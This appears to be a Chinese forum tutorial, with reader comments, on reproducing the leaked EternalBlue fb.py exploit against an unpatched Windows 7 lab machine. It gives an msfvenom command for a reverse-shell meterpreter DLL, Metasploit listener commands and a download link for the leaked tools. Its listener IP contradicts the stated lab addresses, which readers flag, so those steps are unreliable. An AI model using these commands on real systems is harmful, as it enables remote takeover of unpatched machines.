方程式ETERNALBLUE 之fb.py的复现
那会在微信群,9484应大家的建议,写了一篇关于方程式的FB.py复现的一篇文章,这篇文章是9484写的,我只是代发。推给大家,希望能解决大家的困惑,文章写的很清晰,我不多BB了,不然要挨骂。嘿嘿。
十分感谢9484大牛的分享!
0x01.环境简介
攻击机win2003
ip:192.168.1.105
攻击机kali:
ip:192.168.1.106
靶机(被攻击机)window7 x64(未装smb漏洞补丁)
ip:192.168.1.100
0x02.windows2003攻击机
攻击机win2003安装环境:
安装好python后,需要在win2003设置环境变量:
将整个ETERNALBLUE 目录下的 windows拷贝到攻击机win2003上
在windows目录下建立一个文件为:listeningposts
运行phthon fb.py
以下在攻击机win2003上执行fb.py的具体命令重要命令如下,其他命令都用回车执行。
0x03.攻击机kali上
利用msf生成一个dll劫持文件:
将s.dll文件拷贝到windows2003的C盘目录下:
在msf下开启msfpaylod监听:
0x04.接着在windows2003下执行
最后在msf下可以看到成功反弹shell:
doc文档
链接:http://pan.baidu.com/s/1bo2tHuv 密码:hq47
十分感谢9484大牛的分享!
0x01.环境简介
攻击机win2003
ip:192.168.1.105
攻击机kali:
ip:192.168.1.106
靶机(被攻击机)window7 x64(未装smb漏洞补丁)
ip:192.168.1.100
0x02.windows2003攻击机
攻击机win2003安装环境:
python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/
pywin32-221.win-amd64-py2.6.exe:
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/
方程式ETERNALBLUE 下载地址:
https://codeload.github.com/misterch0c/shadowbroker/zip/master
安装好python后,需要在win2003设置环境变量:
将整个ETERNALBLUE 目录下的 windows拷贝到攻击机win2003上
在windows目录下建立一个文件为:listeningposts
运行phthon fb.py
以下在攻击机win2003上执行fb.py的具体命令重要命令如下,其他命令都用回车执行。
0x03.攻击机kali上
利用msf生成一个dll劫持文件:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=5555 -f dll > /opt/s.dll将s.dll文件拷贝到windows2003的C盘目录下:
在msf下开启msfpaylod监听:
use exploit/multi/handler
set lhost 192.168.1.106
set lport 5555
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit0x04.接着在windows2003下执行
最后在msf下可以看到成功反弹shell:
doc文档
链接:http://pan.baidu.com/s/1bo2tHuv 密码:hq47
关于作者
评论135次
@Aimuer 那可能我安装错了版本,谢谢
今天在虚拟机测试成功了 去真实环境又不成功了 莫名其妙的 还在找原因
支持别的xi统吗?Windows2003测试失败了。还有Windows 2008.
感觉全网都在用此教程
重新编辑下,找到了blue了,直接输入没成功,需要tab出来
加载远控的dll原理一样的,感谢楼主分享教程!也xi望小伙伴用这个东东进行应急响应https://www.t00ls.com/thread-39371-1-1.html
有人提取出来写成专门的利用工具么?
已复现...特意下载一个WIN2003
good share .测试win8 win 10可以吗
Traceback (most recent call last): File "fb.py", line 36, in <module> from fuzzbunch.edfplugin import EDFPlugin File "C:\Users\guodong\Desktop\hk\windows\fuzzbunch\edfplugin.py", line 5, in<module> import edfexecution File "C:\Users\guodong\Desktop\hk\windows\fuzzbunch\edfexecution.py", line 30, in <module> import win32pipeImportError: No module named win32pipe这个怎么回事?
没有安装pywin32吧
64 位的虚拟机 7,也不行?
虚拟机xi统多少位,没关xi,需要装32位的py,和pywin
Python 版本必须是32位的吧
还必须是2.6的32位?
我这个是i什么情况 运行python fd.py 出现:python: can't open file 'fd.py': No such file or directory
是fb.py
Traceback (most recent call last): File "fb.py", line 36, in <module> from fuzzbunch.edfplugin import EDFPlugin File "C:\Users\guodong\Desktop\hk\windows\fuzzbunch\edfplugin.py", line 5, in<module> import edfexecution File "C:\Users\guodong\Desktop\hk\windows\fuzzbunch\edfexecution.py", line 30, in <module> import win32pipeImportError: No module named win32pipe这个怎么回事?
没有安装pywin32吧
64 位的虚拟机 7,也不行?
Traceback (most recent call last): File "fb.py", line 36, in <module> from fuzzbunch.edfplugin import EDFPlugin File "C:\Users\guodong\Desktop\hk\windows\fuzzbunch\edfplugin.py", line 5, in<module> import edfexecution File "C:\Users\guodong\Desktop\hk\windows\fuzzbunch\edfexecution.py", line 30, in <module> import win32pipeImportError: No module named win32pipe这个怎么回事?
没有安装pywin32吧
python 必须是32位的么??
对的,必须32位的python2.6否则你装不上pywin32
python 必须是32位的么??
Traceback (most recent call last): File "fb.py", line 36, in <module> from fuzzbunch.edfplugin import EDFPlugin File "C:\Users\guodong\Desktop\hk\windows\fuzzbunch\edfplugin.py", line 5, in <module> import edfexecution File "C:\Users\guodong\Desktop\hk\windows\fuzzbunch\edfexecution.py", line 30, in <module> import win32pipe ImportError: No module named win32pipe 这个怎么回事?
听说这东西有后门,还能虚机逃逸,不知道是不是真的?
这个,还真的不是很清楚。
兄弟 你代发也细点心不要误导他人好么?你有没有拿着流程去做测试?“利用msf生成一个dll劫持文件:” 这个部分哪里出来的1.131? 你生成131 dll试试 如果能成功就见鬼了,发帖子要负责任,不是复制粘贴
抱歉啊,大哥,这个是我的错,利用msf生成一个dll劫持文件,这个,LHOST其实大家都懂,下面的108跟131不同,这个我也才发现,没看仔细,因为我自己测试的时候,LHOST我填的是自己本地靶机的IP
听说这东西有后门,还能虚机逃逸,不知道是不是真的?